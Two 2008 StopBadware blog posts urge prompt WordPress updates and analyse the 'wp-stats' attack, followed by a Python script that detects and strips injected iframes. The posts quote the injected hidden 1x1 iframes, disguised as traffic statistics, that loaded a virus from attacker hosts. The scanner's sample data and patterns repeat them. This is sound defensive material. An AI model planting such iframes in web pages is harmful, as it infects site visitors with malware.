Important WordPress security update

Posted by Erica George Mon, 28 Apr 2008 16:06:08 GMT

From the official WordPress.org blog:

Version 2.5.1 of WordPress is now available. It includes a number of bug fixes, performance enhancements, and one very important security fix. We recommend everyone update immediately, particularly if your blog has open registration. The vulnerability is not public but it will be shortly.

If you run a WordPress site and haven't already applied this security update, doing so now is your best bet to keep your site from being victimized. Once attackers work out the vulnerability from the fix, sites still running earlier versions of WordPress will very likely be attacked.

Badware distributors have attacked WordPress sites before, most notably with the recent wp-stats iframe. At StopBadware, we’re still hearing from website owners whose sites are running older versions of WordPress and are being compromised with wp-stats, which exploits a vulnerability that’s now several months old.

Our advice for owners of WordPress sites? As StopBadware volunteer Steven Whitney wrote during the previous wave of attacks:

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced.


StopBadware discussion group sees flurry of hacked WordPress blogs

Posted by Erica George Mon, 18 Feb 2008 21:23:21 GMT

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

<!-- Traffic Statistics --> <iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren’t put on the pages by the authors, and they’re not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor’s computer with the virus JS_PSYME.XP.

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It’s not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at Secunia.

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.
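An added example, not part of Steven's post and not a StopBadware or WordPress tool: a small Python scanner that flags the injected iframes described above using any of three signals (a 1x1 iframe, a src path containing "wp-stats", or the "Traffic Statistics" comment wrapper) and strips them from post content. The post bodies are constructed sample data; the two hostnames are kept defanged with a space exactly as they appear above, so nothing here points at a live URL.

```python
import re

# Constructed sample post bodies (hypothetical post IDs, not real report data).
# Hostnames are defanged with a space, as in the post above.
SAMPLE_POSTS = {
    1: "<p>Hello world</p>",
    2: ('<p>My post</p><!-- Traffic Statistics --> '
        '<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" '
        'frameborder="0" height="1" width="1"></iframe> '
        '<!-- End Traffic Statistics -->'),
    3: ('<p>Embedded video</p><iframe src="https://example.org/video" '
        'width="560" height="315"></iframe>'),
    4: ('<p>No wrapper this time</p><iframe src="http://61.132.75. 71/iframe/wp-stats.php" '
        'frameborder="0" height="1" width="1"></iframe>'),
}

# Opening tag captured separately so attributes are parsed from it alone.
IFRAME_RE = re.compile(r"(<iframe\b[^>]*>).*?</iframe>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")
INJECTED_BLOCK_RE = re.compile(
    r"<!--\s*Traffic Statistics\s*-->.*?<!--\s*End Traffic Statistics\s*-->",
    re.IGNORECASE | re.DOTALL,
)


def iframe_attrs(open_tag):
    """Return the attributes of an <iframe ...> opening tag, keys lower-cased."""
    return {k.lower(): v for k, v in ATTR_RE.findall(open_tag)}


def is_hidden(attrs):
    """True for a 1x1 (or smaller) iframe, the size used to keep the injection out of sight."""
    try:
        return int(attrs.get("height", "100")) <= 1 and int(attrs.get("width", "100")) <= 1
    except ValueError:
        return False


def scan_post(post_id, html):
    """Return one finding per suspicious iframe in a post body, with the reasons it tripped."""
    block_spans = [(b.start(), b.end()) for b in INJECTED_BLOCK_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = iframe_attrs(m.group(1))
        src = attrs.get("src", "")
        reasons = []
        if is_hidden(attrs):
            reasons.append("1x1 iframe")
        if "wp-stats" in src.lower():
            reasons.append("known wp-stats path")
        if any(start <= m.start() < end for start, end in block_spans):
            reasons.append("Traffic Statistics wrapper")
        if reasons:
            findings.append({"post": post_id, "src": src, "reasons": reasons})
    return findings


def scan_all(posts):
    """Scan a mapping of post_id -> HTML body and return all findings."""
    out = []
    for post_id, html in posts.items():
        out.extend(scan_post(post_id, html))
    return out


def clean_post(html):
    """Remove the comment-wrapped injection, then any 1x1 iframe left outside a wrapper."""
    html = INJECTED_BLOCK_RE.sub("", html)

    def drop_hidden(m):
        return "" if is_hidden(iframe_attrs(m.group(1))) else m.group(0)

    return IFRAME_RE.sub(drop_hidden, html)


if __name__ == "__main__":
    for f in scan_all(SAMPLE_POSTS):
        print(f"post {f['post']}: {', '.join(f['reasons'])} -> {f['src']}")
    print(repr(clean_post(SAMPLE_POSTS[2])))
```

The cleaner removes the whole wrapped block rather than only the iframe tag, so the misleading "Traffic Statistics" comments do not linger in the post. Post 3 shows why a 1x1 check is needed in addition to the wp-stats string: a legitimate embedded player is a full-size iframe and is left alone. On a live site the same matching would be run over the post bodies pulled from the wp_posts table rather than over an inline dictionary.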
